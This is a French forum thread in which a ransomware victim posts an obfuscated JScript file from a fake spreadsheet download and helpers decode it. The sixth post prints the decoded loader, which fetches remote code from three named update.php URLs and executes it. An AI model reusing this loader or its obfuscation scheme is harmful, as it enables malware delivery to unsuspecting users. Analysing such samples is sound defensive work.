Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

  1. #1
    Futur Membre du Club
    Profil pro
    Inscrit en
    novembre 2009
    Messages
    27
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : novembre 2009
    Messages : 27
    Points : 9
    Points
    9
    Par défaut Explication sur code qui lance potentiellement un virus
    Bonjour tout le monde,

    Récemment j'ai choppé un virus qui m'a crypté mes données.
    J'ai un fichier que j'avais DL qui est devenu mon suspect n°1.
    Je ne suis pas sur mais bon je laisse les pro du JS à me traduire ce code qui me parait tout de même louche, j'ai l'impression que ça noye le poisson.
    En gros peut-on simplifier ce code en quelques lignes afin de voir vraiment ce qu'il fait.
    A la base tout ce texte était écrit sur quelques lignes sans saut de lignes, j'ai essayé de faire un saut de ligne après chaque ";", j'en ai peut etre loupé un.


    Merci par avance.
    Je vous souhaite une bonne soirée.
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    242
    243
    244
    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    258
    259
    260
    261
    262
    263
    264
    265
    266
    267
    268
    269
    270
    271
    272
    273
    274
    275
    276
    277
    278
    279
    280
    281
    282
    283
    284
    285
    286
    287
    288
    289
    290
    291
    292
    293
    294
    295
    296
    297
    298
    299
    300
    301
    302
    303
    304
    305
    306
    307
    308
    309
    310
    311
    312
    313
    314
    315
    316
    317
    318
    319
    320
    321
    322
    323
    324
    325
    326
    327
    328
    329
    330
    331
    332
    333
    334
    335
    OL=["y","-","H","!","O",";",":","3"];
    dg=["c",",","m","{","S","f","x","a"];
    lX=["D","}","=","e","s","T","0"," "];
    zn=["o","t","M","w","\"","/","\\","'"];
    bR=["h","i","q","C","L","N","u","z"];
    IC=["X",")","E","l","j","+","W","("];
    dO=["g","p","@","6","?","n","G","."];
    fU=["1","b","v","r","P","I","d","F"];
    aS=["7","2"];
    Ix=WScript.Arguments.Length;
    Uc=Ix+1;
    bE=Uc+Uc;
    Ca=bE+Uc;
    Oc=Ca+Uc;
    bm=Oc+Uc;
    iA=bm+Uc;
    dH=iA+Uc;
    gr=dH+Uc;
    Xb=gr+Uc;
    function Fz(pl,lE){return lE=(pl);}iX=dg[Ix]+zn[Ix]+dO[bm];Fs=lX[Oc]+zn[Uc]+fU[Ca];
    Qv=bR[iA]+dg[Ix]+zn[Uc];
    rV=zn[Ix]+fU[Ca];
    wp=iX+Fs+Qv+rV;
    Fz=Fz[Fz(wp)];
    Ak=IC[iA]+dg[Oc]+dg[Ix];
    ta=fU[Ca]+bR[Uc]+dO[Uc];
    Kh=zn[Uc]+dO[dH]+lX[Oc];
    Sj=IC[Ca]+lX[Ca]+lX[Ca];
    pp=dO[Uc]+IC[dH]+fU[Ix];
    Ga=aS[Ix]+lX[iA]+lX[iA];
    CZ=lX[iA]+IC[Uc]+OL[bm];
    sV=lX[dH]+dg[bm]+bR[iA];
    GW=dO[bm]+dg[Ix]+zn[Uc];
    cg=bR[Uc]+zn[Ix]+dO[bm];
    pz=lX[dH]+dg[dH]+fU[Ca];
    sG=IC[dH]+lX[bm]+bR[Ix];
    BO=IC[Uc]+lX[dH]+dg[Ca];
    kT=lX[dH]+IC[Ca]+zn[Uc];
    hQ=lX[dH]+lX[bE]+lX[dH];
    cB=IC[iA]+dg[Oc]+dg[Ix];
    cD=fU[Ca]+bR[Uc]+dO[Uc];
    MN=zn[Uc]+dO[dH]+bR[Ca];
    pK=fU[Ca]+lX[Ca]+dg[dH];
    VH=zn[Uc]+lX[Ca]+OL[Oc];
    px=fU[Uc]+IC[Oc]+lX[Ca];
    Ke=dg[Ix]+zn[Uc]+IC[dH];
    LE=zn[dH]+zn[bE]+dg[Oc];
    uE=IC[Ix]+zn[bE]+bR[Oc];
    pr=aS[Uc]+dO[dH]+dg[Oc];
    ko=lX[Ca]+fU[Ca]+fU[bE];
    dZ=lX[Ca]+fU[Ca]+IC[Ix];
    ut=zn[bE]+bR[Oc]+OL[bE];
    mV=lX[bm]+lX[bm]+fU[Oc];
    aR=zn[dH]+IC[Uc]+OL[bm];
    OO=lX[dH]+bR[bm]+bR[bm];
    sv=lX[dH]+lX[bE]+lX[dH];
    vk=zn[bE]+dg[dH]+zn[Uc];
    UJ=bR[Ix]+dO[dH]+fU[Ca];
    EQ=dg[dH]+dO[bm]+fU[iA];
    YR=zn[Ix]+dg[bE]+IC[dH];
    vV=IC[Uc]+dO[dH]+zn[Uc];
    xN=zn[Ix]+dg[Oc]+zn[Uc];
    pv=fU[Ca]+bR[Uc]+dO[bm];
    QL=dO[Ix]+IC[dH]+IC[Uc];
    qC=dO[dH]+lX[Oc]+bR[iA];
    NH=fU[Uc]+lX[Oc]+zn[Uc];
    BL=fU[Ca]+IC[dH]+aS[Uc];
    kB=dg[Uc]+fU[Ix]+lX[iA];
    jd=lX[iA]+IC[Uc]+OL[bm];
    cM=lX[dH]+zn[Uc]+fU[Ca];
    HG=OL[Ix]+dg[Ca]+lX[dH];
    pi=IC[Ca]+zn[Uc]+dO[dH];
    YN=zn[Ix]+dO[Uc]+lX[Ca];
    BB=dO[bm]+IC[dH]+zn[dH];
    VZ=dO[iA]+IC[bE]+lX[bm];
    dv=zn[dH]+dg[Uc]+lX[dH];
    iM=lX[bm]+bR[Ix]+IC[bm];
    vd=zn[Oc]+dO[Oc]+dg[Ix];
    sC=bR[bE]+bR[bE]+lX[Ca];
    DT=bR[Uc]+bR[iA]+dO[bm];
    Rb=dg[bm]+dg[iA]+IC[Ca];
    md=zn[Uc]+dO[Uc]+fU[iA];
    mJ=dg[bm]+lX[bE]+zn[Oc];
    NZ=IC[bm]+bR[bm]+bR[bm];
    Pi=dg[Uc]+lX[dH]+dg[bm];
    Se=dg[dH]+IC[Ca]+lX[Oc];
    Wl=lX[Ca]+IC[Uc]+OL[bm];
    IR=lX[dH]+IC[Ca]+zn[Uc];
    MB=dO[dH]+lX[Oc]+lX[Ca];
    Ao=dO[bm]+fU[iA]+IC[dH];
    gg=IC[Uc]+OL[bm]+lX[dH];
    Ju=lX[Uc]+dg[Ix]+dg[dH];
    bM=zn[Uc]+dg[Ix]+bR[Ix];
    ls=IC[dH]+lX[Ca]+IC[Uc];
    iO=dg[Ca]+lX[dH]+fU[Ca];
    Yq=lX[Ca]+zn[Uc]+bR[iA];
    ax=fU[Ca]+dO[bm]+lX[dH];
    HK=dg[bm]+dg[dH]+IC[Ca];
    TV=lX[Oc]+lX[Ca]+OL[bm];
    ws=lX[dH]+lX[Uc]+lX[dH];
    gV=bR[Uc]+dg[bm]+lX[dH];
    Hw=IC[dH]+IC[Ca]+zn[Uc];
    Dh=dO[dH]+lX[Oc]+zn[Uc];
    mo=dg[dH]+zn[Uc]+bR[iA];
    ij=lX[Oc]+lX[dH]+lX[bE];
    uA=lX[bE]+lX[bE]+lX[dH];
    bX=aS[Uc]+lX[iA]+lX[iA];
    FP=IC[Uc]+lX[dH]+dg[Ca];
    qD=lX[dH]+fU[bE]+dg[dH];
    VI=fU[Ca]+lX[dH]+zn[Ca];
    YW=zn[Uc]+lX[dH]+lX[bE];
    hc=lX[dH]+IC[Ca]+zn[Uc];
    Ej=dO[dH]+fU[Ca]+lX[Ca];
    gJ=lX[Oc]+dO[Uc]+zn[Ix];
    OH=dO[bm]+lX[Oc]+lX[Ca];
    Uq=lX[bm]+lX[Ca]+dg[iA];
    ao=zn[Uc]+OL[bm]+lX[dH];
    Fw=bR[Uc]+dg[bm]+lX[dH];
    dn=IC[dH]+IC[dH]+zn[Ca];
    TE=zn[Uc]+dO[dH]+bR[Uc];
    CC=dO[bm]+fU[iA]+lX[Ca];
    xR=dg[iA]+OL[Oc]+dg[bm];
    RF=IC[dH]+zn[Oc]+dO[bE];
    BU=zn[Oc]+IC[bm]+bR[bm];
    CV=bR[bm]+IC[bm]+zn[Oc];
    wf=dO[bE]+zn[Oc]+dg[Uc];
    Ln=lX[dH]+lX[iA]+IC[Uc];
    HW=IC[Uc]+lX[bE]+lX[bE];
    Kz=OL[Uc]+fU[Ix]+IC[Uc];
    Xf=lX[dH]+dg[Ca]+lX[dH];
    gY=fU[Ca]+lX[Ca]+zn[Uc];
    IG=bR[iA]+fU[Ca]+dO[bm];
    Tc=lX[dH]+dg[bm]+dg[dH];
    Lb=IC[Ca]+lX[Oc]+lX[Ca];
    jO=OL[bm]+lX[dH]+lX[Uc];
    bo=lX[dH]+lX[Ca]+IC[Ca];
    Il=lX[Oc]+lX[Ca]+lX[dH];
    Vv=dg[Ca]+lX[dH]+zn[Ca];
    pm=zn[Uc]+lX[dH]+lX[bE];
    nW=lX[dH]+zn[Ca]+zn[Uc];
    OR=dO[dH]+fU[Ca]+lX[Ca];
    UF=dO[Uc]+IC[Ca]+dg[dH];
    gU=dg[Ix]+lX[Ca]+IC[dH];
    cm=zn[Oc]+dO[bE]+zn[Oc];
    YG=IC[bm]+bR[bm]+bR[bm];
    oh=IC[bm]+zn[Oc]+dO[bE];
    yX=zn[Oc]+dg[Uc]+zn[Oc];
    eK=zn[Oc]+IC[Uc]+OL[bm];
    GZ=lX[dH]+fU[bE]+dg[dH];
    Dy=fU[Ca]+lX[dH]+lX[Ix];
    cZ=bR[dH]+lX[dH]+lX[bE];
    LJ=lX[dH]+zn[Ca]+zn[Uc];
    ww=dO[dH]+fU[Ca]+lX[Ca];
    CQ=dO[Uc]+IC[Ca]+dg[dH];
    es=dg[Ix]+lX[Ca]+IC[dH];
    oK=zn[bm]+IC[dH]+zn[iA];
    yh=fU[iA]+dg[Ca]+aS[Uc];
    tR=lX[Uc]+IC[Uc]+zn[bm];
    Gx=dO[Ix]+dg[Uc]+lX[dH];
    EB=dg[bm]+bR[iA]+dO[bm];
    cp=dg[Ix]+zn[Uc]+bR[Uc];
    Hu=zn[Ix]+dO[bm]+lX[dH];
    uj=IC[dH]+dg[iA]+bR[Oc];
    xb=IC[Uc]+lX[dH]+dg[Ca];
    Kx=lX[dH]+fU[Ca]+lX[Ca];
    pn=zn[Uc]+bR[iA]+fU[Ca];
    ZK=dO[bm]+lX[dH]+dg[Oc];
    SA=zn[Uc]+fU[Ca]+bR[Uc];
    se=dO[bm]+dO[Ix]+dO[dH];
    hn=dg[bm]+fU[Ca]+zn[Ix];
    AL=dg[bE]+bR[Ca]+bR[Ix];
    qM=dg[dH]+fU[Ca]+bR[Ca];
    ZI=zn[Ix]+fU[iA]+lX[Ca];
    wq=IC[dH]+dO[Uc]+dg[dH];
    WS=fU[Ca]+lX[Oc]+lX[Ca];
    lD=fU[bm]+dO[bm]+zn[Uc];
    Vf=IC[dH]+dg[iA]+bR[Oc];
    eY=dg[Uc]+fU[Ix]+lX[iA];
    ly=IC[Uc]+IC[bm]+OL[dH];
    xn=lX[iA]+IC[Uc]+OL[bm];
    Gf=lX[dH]+lX[Uc]+IC[Uc];
    TB=OL[bm]+lX[dH]+fU[dH];
    UO=bR[dH]+IC[dH]+lX[Ix];
    EM=bR[dH]+IC[Uc]+IC[dH];
    Kt=IC[Uc]+OL[bm]+lX[dH];
    mU=fU[Ca]+lX[Ca]+zn[Uc];
    ra=bR[iA]+fU[Ca]+dO[bm];
    sk=lX[dH]+zn[Uc]+fU[Ca];
    Ay=bR[iA]+lX[Ca]+OL[bm];
    It=lX[dH]+lX[Uc]+lX[dH];
    Ss=lX[Uc]+lX[dH]+lX[Ca];
    Ai=IC[Ca]+lX[Oc]+lX[Ca];
    XL=lX[dH]+dg[Ca]+lX[dH];
    hu=fU[Ca]+lX[Ca]+zn[Uc];
    Ew=bR[iA]+fU[Ca]+dO[bm];
    zq=lX[dH]+dg[bm]+dg[dH];
    Fv=IC[Ca]+lX[Oc]+lX[Ca];
    jT=OL[bm]+lX[dH]+lX[Uc];
    Km=lX[dH]+lX[Uc]+lX[dH];
    VF=bR[Uc]+dg[bm]+lX[dH];
    GL=IC[dH]+OL[Ca]+lX[dH];
    En=dg[dH]+fU[Ca]+IC[dH];
    Pv=zn[dH]+bR[Ix]+zn[Uc];
    BH=zn[Uc]+dO[Uc]+OL[iA];
    LG=zn[bm]+zn[bm]+zn[Ca];
    Fp=bR[Uc]+dg[bE]+dg[dH];
    Za=fU[Ca]+IC[Oc]+dg[dH];
    Tz=lX[Ca]+dO[Ix]+lX[Ca];
    uK=fU[Ca]+dO[dH]+dO[bm];
    ky=IC[Ca]+zn[bm]+bR[iA];
    tP=dO[Uc]+fU[iA]+dg[dH];
    Bi=zn[Uc]+lX[Ca]+dO[dH];
    QT=dO[Uc]+bR[Ix]+dO[Uc];
    Qh=zn[dH]+IC[Uc]+IC[Uc];
    ym=lX[dH]+dg[Ca]+lX[dH];
    Ou=IC[iA]+dg[Oc]+dg[Ix];
    kg=fU[Ca]+bR[Uc]+dO[Uc];
    Ah=zn[Uc]+dO[dH]+lX[Oc];
    mA=IC[Ca]+lX[Ca]+lX[Ca];
    Eg=dO[Uc]+IC[dH]+OL[dH];
    yZ=lX[iA]+lX[iA]+lX[iA];
    qy=lX[iA]+IC[Uc]+OL[bm];
    EC=lX[dH]+bR[Uc]+dg[bm];
    BY=lX[dH]+IC[dH]+OL[Ca];
    PQ=lX[dH]+dg[dH]+fU[Ca];
    it=IC[dH]+zn[dH]+bR[Ix];
    fK=zn[Uc]+zn[Uc]+dO[Uc];
    Mc=OL[iA]+zn[bm]+zn[bm];
    um=zn[Ca]+zn[Ca]+zn[Ca];
    ux=dO[dH]+lX[Ca]+IC[Ca];
    OT=bR[Uc]+lX[Oc]+dg[dH];
    ai=fU[iA]+lX[Ca]+fU[bE];
    pd=dg[dH]+IC[Ca]+dO[dH];
    Iu=dg[Ix]+zn[Ix]+dg[bE];
    YJ=zn[bm]+bR[iA]+dO[Uc];
    KN=fU[iA]+dg[dH]+zn[Uc];
    JP=lX[Ca]+dO[dH]+dO[Uc];
    QC=bR[Ix]+dO[Uc]+zn[dH];
    Yu=IC[Uc]+IC[Uc]+lX[dH];
    qH=dg[Ca]+lX[dH]+IC[iA];
    Hr=dg[Oc]+dg[Ix]+fU[Ca];
    Dj=bR[Uc]+dO[Uc]+zn[Uc];
    ks=dO[dH]+lX[Oc]+IC[Ca];
    WG=lX[Ca]+lX[Ca]+dO[Uc];
    Sb=IC[dH]+dO[Ca]+lX[iA];
    RM=lX[iA]+lX[iA]+lX[iA];
    Bp=IC[Uc]+OL[bm]+lX[dH];
    Hq=dg[dH]+fU[Ca]+IC[dH];
    WE=zn[dH]+bR[Ix]+zn[Uc];
    Wd=zn[Uc]+dO[Uc]+OL[iA];
    mk=zn[bm]+zn[bm]+zn[Ca];
    Lo=zn[Ca]+zn[Ca]+dO[dH];
    Vq=bR[bE]+bR[iA]+bR[Uc];
    MY=dO[bm]+dO[bm]+lX[Ca];
    QW=IC[Ca]+dO[dH]+dg[Ix];
    Gj=zn[Ix]+dg[bE]+zn[bm];
    lr=bR[iA]+dO[Uc]+fU[iA];
    ri=dg[dH]+zn[Uc]+lX[Ca];
    mn=dO[dH]+dO[Uc]+bR[Ix];
    tp=dO[Uc]+zn[dH]+IC[Uc];
    pT=OL[bm]+lX[dH]+lX[Uc];
    tu=lX[dH]+lX[Uc];
    NR=Ak+ta;
    Mn=NR+Kh+Sj+pp;
    RL=Mn+Ga+CZ;
    cO=RL+sV+GW;
    ll=cO+cg+pz;
    fa=ll+sG+BO;
    tM=fa+kT+hQ+cB;
    wU=tM+cD+MN;
    sd=wU+pK+VH+px+Ke+LE;
    Jd=sd+uE+pr+ko+dZ+ut;
    hA=Jd+mV+aR+OO+sv+vk;
    uH=hA+UJ+EQ;
    ET=uH+YR+vV+xN;
    xo=ET+pv+QL+qC+NH+BL;
    Jm=xo+kB+jd+cM;
    xJ=Jm+HG+pi;
    Jj=xJ+YN+BB+VZ+dv;
    TG=Jj+iM+vd;
    lg=TG+sC+DT+Rb+md;
    uc=lg+mJ+NZ+Pi+Se+Wl;
    To=uc+IR+MB+Ao+gg;
    sl=To+Ju+bM+ls;
    Xk=sl+iO+Yq+ax+HK;
    RS=Xk+TV+ws+gV+Hw+Dh;
    Fe=RS+mo+ij+uA+bX;
    yT=Fe+FP+qD+VI;
    sI=yT+YW+hc;
    PK=sI+Ej+gJ+OH+Uq;
    cf=PK+ao+Fw+dn;
    xz=cf+TE+CC+xR;
    jU=xz+RF+BU+CV;
    Fg=jU+wf+Ln+HW;
    mF=Fg+Kz+Xf+gY+IG+Tc;
    NK=mF+Lb+jO+bo+Il;
    pP=NK+Vv+pm+nW+OR;
    Ps=pP+UF+gU;
    Ie=Ps+cm+YG+oh+yX;
    Yk=Ie+eK+GZ+Dy+cZ+LJ;
    jS=Yk+ww+CQ;
    zj=jS+es+oK+yh+tR;
    kZ=zj+Gx+EB+cp+Hu;
    Do=kZ+uj+xb+Kx+pn+ZK;
    Zf=Do+SA+se+hn+AL;
    BW=Zf+qM+ZI;
    iu=BW+wq+WS+lD+Vf;
    sA=iu+eY+ly;
    KB=sA+xn+Gf;
    FD=KB+TB+UO+EM;
    MC=FD+Kt+mU;
    aU=MC+ra+sk+Ay+It+Ss;
    kA=aU+Ai+XL;
    Np=kA+hu+Ew+zq+Fv+jT;
    Nk=Np+Km+VF;
    TI=Nk+GL+En+Pv+BH+LG;
    tT=TI+Fp+Za+Tz+uK;
    zX=tT+ky+tP+Bi+QT+Qh;
    Pa=zX+ym+Ou+kg;
    Tp=Pa+Ah+mA+Eg+yZ;
    hw=Tp+qy+EC+BY+PQ;
    KD=hw+it+fK+Mc+um+ux;
    Xg=KD+OT+ai;
    aI=Xg+pd+Iu;
    Qj=aI+YJ+KN+JP;
    vR=Qj+QC+Yu+qH+Hr+Dj;
    qO=vR+ks+WG+Sb+RM;
    eZ=qO+Bp+Hq+WE+Wd+mk;
    aE=eZ+Lo+Vq;
    TJ=aE+MY+QW+Gj;
    DK=TJ+lr+ri+mn+tp;
    by=DK+pT+tu;
    Bo=by;
    Fz(Bo)(Fz('')(470117));

  2. #2
    Futur Membre du Club
    Profil pro
    Inscrit en
    novembre 2009
    Messages
    27
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : novembre 2009
    Messages : 27
    Points : 9
    Points
    9
    Par défaut
    J'ai l'impression qu'il y a du Visual Basic Script également.

  3. #3
    Membre confirmé
    Homme Profil pro
    Analyse système
    Inscrit en
    mai 2014
    Messages
    334
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Arménie

    Informations professionnelles :
    Activité : Analyse système
    Secteur : Arts - Culture

    Informations forums :
    Inscription : mai 2014
    Messages : 334
    Points : 511
    Points
    511
    Par défaut
    Bonjour,

    Je ne connaissais pas cette manière de chiffrer du code. La ligne
    Ix=WScript.Arguments.Length;
    montre qu'il existe une fonction WScript, mais elle n'est évoquée qu'une seule fois. A mon avis, il manque quelques lignes de code pour retrouver le code original.

    Sinon on évite :
    • la perte des données en effectuant des sauvegardes sur divers supports
    • les virus en utilisant un système d'exploitation fiable, un système GNU/Linux par exemple.

  4. #4
    Membre expert
    Avatar de Doksuri
    Profil pro
    Développeur Web
    Inscrit en
    juin 2006
    Messages
    1 785
    Détails du profil
    Informations personnelles :
    Âge : 49
    Localisation : France

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : juin 2006
    Messages : 1 785
    Points : 3 000
    Points
    3 000
    Par défaut
    en effet, si tu google "WScript.Arguments.Length", tu tombes sur du VB.
    les premiers tableaux ne sont rien d'autre que l'alphabet et certains caracteres (){}\/... melanges
    il faudrait comprendre ce que retourne WScript.Arguments.Length (qui semble etre une longueure... mais je ne connais pas le VB)

    si tu connais Ix dans la ligne Ix=WScript.Arguments.Length;
    tu peux decoder tout le reste, vu que c'est une grosse concatenation...
    il va piocher dans l'alphabet (mais avec un decallage de Ix)
    La forme des pyramides prouve que l'Homme a toujours tendance a en faire de moins en moins.

  5. #5
    Futur Membre du Club
    Profil pro
    Inscrit en
    novembre 2009
    Messages
    27
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : novembre 2009
    Messages : 27
    Points : 9
    Points
    9
    Par défaut
    J'ai essayé d'analysé le code avec mes peu de connaissance et google.

    En effet, j'en ai conclu la même chose, WScript.Arguments.Length est la clé pour pouvoir réécrire le code.
    La question est que vaut cette valoir.
    J'ai cherché sur le net ce bout de code, qui représente le nombre d'argument donné lors du lancement du script.
    C'est un peu flou....
    J'ignore si j'ai bien compris.
    La question est comment connaitre sa valeur.

    ++

  6. #6
    Expert éminent
    Avatar de Watilin
    Homme Profil pro
    En recherche d'emploi
    Inscrit en
    juin 2010
    Messages
    3 000
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 30
    Localisation : France, Ille et Vilaine (Bretagne)

    Informations professionnelles :
    Activité : En recherche d'emploi

    Informations forums :
    Inscription : juin 2010
    Messages : 3 000
    Points : 6 500
    Points
    6 500
    Par défaut
    S’il s’agit d’un script lancé depuis un shell, on peut tenter le coup de chance et supposer qu’il est appelé avec zéro argument. Ainsi, Arguments.Length sera probablement 0. Ou alors 1 si le système considère le nom du programme comme premier argument.

    J’ai essayé d’interpréter le code comme du JS en l’initialisant avec ceci :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    WScript = {
      Arguments: {
        Length: 0
      }
    };
    Ensuite, en regardant la dernière ligne, je me suis dit que Fz devait avoir un rôle important, et en l’examinant j’ai pu voir qu’il était égal au constructeur Function.
    Ainsi, Fz('') est une fonction qui ne fait rien, et Fz('')(470117) est une façon inutilement compliquée d’obtenir la valeur de retour d’une fonction qui ne renvoie rien, autrement dit undefined.

    Mais le plus important est la variable Bo qui est passée à Function et qui contient la partie intéressante du code.
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    WScript.sleep(17000);
    function ar(Th) {
      lt = WScript.CreateObject('MSXML2.ServerXMLHTTP');
      NN = Math.random().toString().substr(2,100);
      try {
        lt.open('GET', Th+"?cqqeiunfxltpdf="+NN, false);
        lt.send();
      }
      catch (e) {
        return false;
      }
     
      if (lt.status === 200) {
        var wt = lt.responseText;
        if ((wt.indexOf("@"+NN+"@", 0))==-1) {
          return false;
        }
        else {
          wt = wt.replace("@"+NN+"@","");
          var Dz = wt.replace(/(\\d{2})/g, function (xL) {
            return String.fromCharCode(parseInt(xL,10)+30);
          });
          Fz(Dz)();
          return true;
        }
      }
      else {
        return false;
      }
    }
     
    if (!ar('http://wimarjaeger.nl/update.php')) {
      WScript.sleep(30000);
      if (!ar('http://www.elisadeval.com/update.php')) {
        WScript.sleep(60000);
        ar('http://www.quinnel.com/update.php');
      }
    }
    On a un truc qui ressemble beaucoup à une requête ajax, avec un objet 'MSXML2.XMLHTTP'. Je pense que le script est conçu pour être exécuté dans Internet Explorer.
    Plus bas on voit trois requêtes vers 3 domaines différents, essayés l’un après l’autre après une pause (sleep) si le précédent n’est pas joignable.

    En imitant la requête envoyée par le script, à chacun de ces domaines, on reçoit une réponse vide. J’imagine que le serveur attend des en-têtes particuliers pour envoyer le vrai payload, peut-être un cookie de session établi avec une requête précédente. En l’état, on n’a pas assez d’informations.
    Une chose est sûre : ce script n’est qu’un simple loader, il ne contient pas le principal code malicieux.
    La FAQ JavaScript – Les cours JavaScript
    Touche F12 = la console → l’outil indispensable pour développer en JavaScript !

  7. #7
    Futur Membre du Club
    Profil pro
    Inscrit en
    novembre 2009
    Messages
    27
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : novembre 2009
    Messages : 27
    Points : 9
    Points
    9
    Par défaut
    Hello Watilin,

    Pour commencer, je précise que je n'ai aucun autre fichier qui va avec.
    Ce document je l'ai téléchargé à cet emplacement
    http://www.sconnect.net/exemple-bila...uissance-xls/#

    Par contre un truc bizarre, la page n'est plus du tout la même qu'hier....
    Hier c'était comme un post de forum avec 4/5 messages dont un qui contenait un fichier .zip à télécharger qui se nommait "exemple_bilan_de_puissance_xls.zip"
    Celui-ci contenait le fichier js "exemple_bilan_de_puissance_xls.js"

    Aujourd'hui la page a changé.... Ma suspicion augment encore....
    J'ai encore le document compressé si ça intéresse du monde.

    J'ai bien lu que WScript.Arguments.Length était le nombre de paramètre lors du lancement du script.
    J'ignore totalement qui fait le lancement et avec quels paramètres, par conséquent je me suis demandé si "Length" ne prenait pas la valeur de 0 si ce script était lancé en double cliquant dessus directement.

    Concernant ta réponse, je t'avoue ne pas tout comprendre, je reste limité dans le codage.
    Dois-je comprendre que le code que tu as écrit correspond en gros à la traduction de son code en prenant 0 comme valeur pour lenght ?
    Si c'est le cas je dirai que tu as vu juste étant donné que l'on a des mots comme "http", si la valeur de lenght n'était pas 0 j'imagine que la probabilité de tombé sur http serait faible voir impossible.

    Tu entends quoi par un "simple loader" ?
    Serait-il capable d'aller télécharger un virus sur un serveur et de l'exécuter ?
    Penses-tu que l'on peut creuser le sujet un peu plus pour avoir des réponses ?

    ++

  8. #8
    Futur Membre du Club
    Profil pro
    Inscrit en
    novembre 2009
    Messages
    27
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : novembre 2009
    Messages : 27
    Points : 9
    Points
    9
    Par défaut
    Une nouvelle toute fraiche.
    A l'instant j'ai Kaspersky qui vient de me supprimer un fichier "backup" de notepad++.
    En effet j'avais copier le code dans une feuille de notepad++, pas la suite je l'ai supprimer.
    Apparemment Notepad++ conserve un backup des pages non sauvegardées.
    Et kaspersky l'a supprimé sans demander mon avis.

    Chose bizarre, c'est que Kaspersky supprime un backup de Notepad++ mais quand j'ai lancé une analyse directement sur le fichier JS il dit qu'il ne trouve rien anormal alors que les deux documents contiennent le même code.

    Nom : KAS.png
Affichages : 69
Taille : 44,1 Ko

  9. #9
    Futur Membre du Club
    Profil pro
    Inscrit en
    novembre 2009
    Messages
    27
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : novembre 2009
    Messages : 27
    Points : 9
    Points
    9
    Par défaut
    Je viens de remarquer quelques chose d'autre, étant donné que j'ai DL le fichier en question 2 fois, j'ai comparé le code des 2 fichiers.
    Je remarque que le code change entre chaque téléchargement.
    Le principe reste le même, mais les variables changent, l'ordre, etc...
    Voici le code du 2ème fichier.

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    242
    243
    244
    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    258
    259
    260
    261
    262
    263
    264
    265
    266
    267
    268
    269
    270
    271
    272
    273
    274
    275
    276
    277
    278
    279
    280
    281
    282
    283
    284
    285
    286
    287
    288
    289
    290
    291
    292
    293
    294
    295
    296
    297
    298
    299
    300
    301
